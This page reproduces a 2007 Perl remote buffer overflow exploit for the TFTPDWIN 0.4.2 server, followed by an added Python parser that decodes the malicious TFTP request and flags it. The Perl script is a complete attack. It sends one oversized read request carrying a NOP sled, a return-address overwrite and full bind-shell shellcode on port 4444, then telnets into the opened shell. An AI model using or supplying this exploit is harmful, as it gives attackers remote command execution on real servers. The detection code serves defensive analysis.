TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
Source: vfocus.net  Author: vfocus  Published: 2007-01-16

#!/usr/bin/perl
# TFTPDWIN 0.4.2 remote buffer overflow.
# An oversized filename inside a single TFTP read request (RRQ) overruns a
# stack buffer in tftpd.exe; the saved return address is replaced with the
# address of a "pop ebp / ret" gadget, execution lands in a NOP sled and the
# embedded shellcode binds a shell on TCP/4444.
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 2) {
    print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
    exit;
}
my ($host, $port) = @ARGV;

my $victim = IO::Socket::INET->new(Proto    => 'udp',
                                   PeerAddr => $host,
                                   PeerPort => $port)
    or die "Cannot connect to $host on port $port: $!";

my $nop0 = "\x90" x 15;

# Small stub placed at the front of the buffer. It jumps to EBX+0x112; the
# exploit relies on EBX pointing into the request buffer when this runs.
#   8BC3        MOV EAX,EBX
#   66:05 1201  ADD AX,0x112
#   50          PUSH EAX
#   C3          RETN
my $asm = "\x8b\xc3\x66\x05\x12\x01\x50\xc3";

my $nop  = "\x90" x 57;
my $nop1 = "\x90" x 7;

my $eip = "\x42\xfb\x61\x40";   # 0x4061fb42: pop ebp / ret in tftpd.exe
#my $eip = "B" x 4;             # use 0x42424242 instead to confirm the EIP offset in a debugger

# A binary translation of "Writing Small Shellcode" (NGS, Dafydd Stuttard) with only two small differences:
# 1) bind port: 4444 in this exploit (\x11\x5c, network byte order); the original shellcode used 6666
# 2) 4 bytes added so the cmd.exe window is not shown on the remote host
my $shellcode =
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";

# TFTP RRQ: opcode 0x0001, NUL-terminated filename (the whole payload),
# NUL-terminated transfer mode "netascii".
my $exploit = "\x00\x01" . $nop0 . $asm . $nop . $shellcode . $nop1 . $eip
            . "\x00" . "netascii" . "\x00";

print $victim $exploit;        # one UDP datagram is enough
print " + Malicious request sent ...\n";

sleep 2;
print "Done.\n";
close $victim;

print " + connecting to port 4444 on $host ...\n";
sleep 3;
system("telnet $host 4444");
exit;
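The script above never shows what the datagram it sends looks like on the wire, which is what a defender or a tester verifying the offsets actually needs. The Python below is an added example and not part of the original page or of TFTPDWIN: it rebuilds the request with the same field lengths as the exploit (the 196-byte shellcode is replaced by a constructed filler of identical length, and the return address 0x4061fb42 is taken from the script), parses it strictly as a TFTP read/write request, reports where the overwritten return address sits in the filename, and applies a few detection heuristics that are my own, not anything the original author described.

```python
"""Decode TFTP RRQ/WRQ datagrams and flag ones shaped like the exploit above.

Added example, not code from the original page or from TFTPDWIN. Field lengths
and the return address are taken from the exploit script; the shellcode is a
constructed stand-in of the same length. RFC 2347 options are not handled.
"""
import struct

RRQ, WRQ = 1, 2
TFTP_MODES = {b"netascii", b"octet", b"mail"}
RET_ADDR = 0x4061FB42   # "pop ebp / ret" in tftpd.exe, as used by the exploit


def build_request(opcode, filename, mode=b"netascii"):
    """Encode a TFTP request: 2-byte opcode, NUL-terminated filename and mode."""
    if b"\x00" in filename or b"\x00" in mode:
        raise ValueError("filename and mode must not contain NUL")
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


def exploit_shaped_filename():
    """Filename with the exploit's layout; shellcode replaced by a constructed filler."""
    nop0 = b"\x90" * 15
    stub = b"\x8b\xc3\x66\x05\x12\x01\x50\xc3"  # mov eax,ebx / add ax,0x112 / push eax / ret
    nop = b"\x90" * 57
    shellcode = b"\xcc" * 196                   # constructed stand-in, same length as the page's
    nop1 = b"\x90" * 7
    eip = struct.pack("<I", RET_ADDR)           # little-endian, exactly as the script sends it
    return nop0 + stub + nop + shellcode + nop1 + eip


def parse_request(datagram):
    """Strictly decode an RRQ/WRQ; raise ValueError on anything malformed."""
    if len(datagram) < 4:
        raise ValueError("datagram too short")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (RRQ, WRQ):
        raise ValueError("not a read/write request: opcode %d" % opcode)
    body = datagram[2:]
    if not body.endswith(b"\x00"):
        raise ValueError("mode string not NUL-terminated")
    fields = body[:-1].split(b"\x00")
    if len(fields) != 2:
        raise ValueError("expected exactly a filename and a mode")
    filename, mode = fields
    return {"opcode": opcode, "filename": filename, "mode": mode.lower()}


def suspicious_reasons(req, max_name=255):
    """Heuristics (mine, not the page's) a detector can apply before the request
    ever reaches a file API. An empty list means the request looks ordinary."""
    name = req["filename"]
    reasons = []
    if len(name) > max_name:
        reasons.append("filename length %d exceeds %d" % (len(name), max_name))
    if any(b < 0x20 or b > 0x7E for b in name):
        reasons.append("non-printable bytes in filename")
    if b"\x90" * 8 in name:
        reasons.append("NOP sled (8 or more consecutive 0x90)")
    if req["mode"] not in TFTP_MODES:
        reasons.append("unknown transfer mode %r" % req["mode"])
    return reasons


def eip_offset(filename):
    """Offset of the 4-byte return address from the start of the filename."""
    return len(filename) - 4


def trailing_return_address(filename):
    """The little-endian dword at the end of the filename, i.e. the new EIP."""
    return struct.unpack("<I", filename[-4:])[0]


if __name__ == "__main__":
    dgram = build_request(RRQ, exploit_shaped_filename())
    req = parse_request(dgram)
    print("datagram %d bytes, filename %d bytes, EIP at filename+%d -> 0x%08x"
          % (len(dgram), len(req["filename"]), eip_offset(req["filename"]),
             trailing_return_address(req["filename"])))
    for reason in suspicious_reasons(req):
        print(" -", reason)
    print("benign request:", suspicious_reasons(parse_request(build_request(RRQ, b"boot.cfg"))))
```

Running it shows the whole attack fits in a 299-byte datagram with the return address 283 bytes into the filename, which is why a single UDP packet is all the Perl script needs to send; the same parser, fed captured TFTP traffic, is enough to flag this request long before a disassembler is involved.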



 